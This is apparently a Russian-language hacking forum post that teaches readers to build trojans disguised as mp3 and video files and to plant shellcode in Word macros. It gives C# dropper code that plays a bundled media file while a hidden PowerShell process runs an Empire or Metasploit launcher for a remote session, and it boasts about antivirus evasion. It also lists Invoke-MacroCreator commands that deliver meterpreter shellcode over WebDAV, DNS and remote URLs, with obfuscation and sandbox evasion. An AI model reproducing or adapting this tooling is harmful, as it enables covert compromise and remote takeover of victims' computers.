Всем привет, решил здесь оставить свой след в
ветке, касаемо нашей любимой темы, пусть останется в веках!))
Заражать мы будем самые распространенные файлы которыми пользуется каждый, так же решил, я еще и доказать Вам свою проф пригодность)
да и думаю не хер в себе все держать! Нужно делится своими находками и наработками! Чего и Вам желаю..
одно подозрительное слово "находками" Да признаюсь сразу эту технику я честно.... спиздил, но при минимальном знании программирования и работай с visual-studio
ее можно настроить под себя)
Итак начнем, с заражения видео файла. Нам по требуется visual-studio 2017 с языком С#, Empire or Metasploit. Я лично буду юзать империю.
Генерим в империи батник, предварительно настроив listener : usestager | windows/launcher_bat убираем лишнее, берем нужное как показано ниже!
Скачиваем эту сборочку открываем в студии и ..
как видите редачим, файл Program.cs и вставляем в 21(очко)) строчку свою строчку сгенеренную в империи)
Детект только один из 40 палит только касперыч(
все просто до "не могу" И не дай мне Бог увидеть эти методики на каких нить РУ-бордах так как я знаю что в РУ-зоне впервые они описываются!) и как этот видео проект создавался Вы поймете ниже на примере создания mp3-virus
Заражаем mp3
Создаем проект как показано выше. Удаляем стандартное заполнение и вставляем свое:
Код:
Код:
using System;
using System.IO;
using System.Diagnostics;
namespace Namespace
{
class Program
{
static void Main()
{
// Copiar el vídeo a un archivo temporal y abrirlo
byte[] archivo = Properties.Resources.NombreArchivo;
string destino = Environment.ExpandEnvironmentVariables(@"%tmp%\nombre_archivo.extension");
File.WriteAllBytes(destino, archivo);
Process procesoArchivo = Process.Start(destino);
// Ejecutar launcher
ProcessStartInfo launcherProcess = new ProcessStartInfo();
// C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
launcherProcess.FileName = Environment.ExpandEnvironmentVariables(@"%windir%\System32\WindowsPowerShell\v1.0\powershell.exe");
launcherProcess.Arguments = "-Command Add-Type -AssemblyName 'System.Windows.Forms'; [Windows.Forms.Messagebox]::Show('Hacked')";
launcherProcess.WindowStyle = ProcessWindowStyle.Hidden;
Process.Start(launcherProcess);
// Esperar a que cierren el vídeo/imagen/pdf, lo que sea
procesoArchivo.WaitForExit();
// Eliminar nuestro vídeo
while (File.Exists(destino))
{
try
{
File.Delete(destino);
}
catch {}
}
}
}
}
[обратите внимание на 25 строку в коде] Уже уловили суть? хех..
Самое главное видео показывает и музыка играет, а к Вам прилетает заветная сессия!)
переименовываем 5 строчку
в свойствах ConsoleApp1 добавляем mp3 ресурс
назовем его античат .mp3
далее изменяем эти строки:
ну и "грузим" своей нагрузкой в нашу 21 строку
coздаем иконку зайдя на этот онлайн
ресурс эту .ico грузим к себе в ресурсы нашей злой эмпэтри - прожки ))
и собираем наше творение...
с GIF-ками и PDF-ками я думаю справитесь....
теперь макрос-ы "Эх! Говорит и показывает Рассея" Шариков П.П
слышали про Invoke лютого криптовщика PowerShell так вот создали продукт на основе его трудов.
PowerShellScripts
Свежачок, для
красной братвы!)
Шеллкод, встроенный в тело документа MS-Word, без обфускации, без уклонения от песочницы:
Код:
Код:
C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -d body
Шеллкод передается по скрытому каналу WebDAV с обфускацией, без уклонения от песочницы:
Код:
Код:
C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -url webdavserver.com -d webdav -o
Сценарий доставлен по библиографическому источнику скрытого канала, с обфускацией, с уклонением песочницы:
Код:
Код:
C:\PS> Invoke-MacroCreator -i regsvr32.sct -t file -url 'http://my.server.com/sources.xml' -d biblio -c 'regsvr32 /u /n /s /i:regsvr32.sct scrobj.dll' -o -e
Исполняемый файл передается через скрытый канал WebDAV, используя UNC, без обфускации, с уклонением от песочницы, используя метод выполнения 3:
Код:
Код:
C:\PS> Invoke-MacroCreator -i badass.exe -p file -t webdav -c 'badass.exe' -e -m 3
Командная строка, встроенная в тело документа MS-Word, с обфускацией, без уклонения от песочницы, с использованием метода выполнения 1:
Код:
Код:
C:\PS> Invoke-MacroCreator -i my_cmd.bat -p cmd -t body -o -m 1
Шеллкод, встроенный в комментарий документа MS-Word, не обфускация, отсутствие уклонения от песочницы, добавление функций автоматического открытия:
Код:
Код:
C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -d comment -a
Шеллкод, поставляемый по скрытому каналу доставки DNS с использованием домена «mydomain.com», с обфускацией, без уклонения от песочницы:
Код:
Код:
C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -d dns -dn mydomain.com -o
Функционал как видите впечатляет, но я пока не тестил и пожалуйста как будете собирать макросы по делитесь здесь буду благодарен очень, честно... Да и другим тоже будет полезно это увидеть)
Спасибо за внимание, с вами был на веки Ваш Ondrik8)
Древовидный вид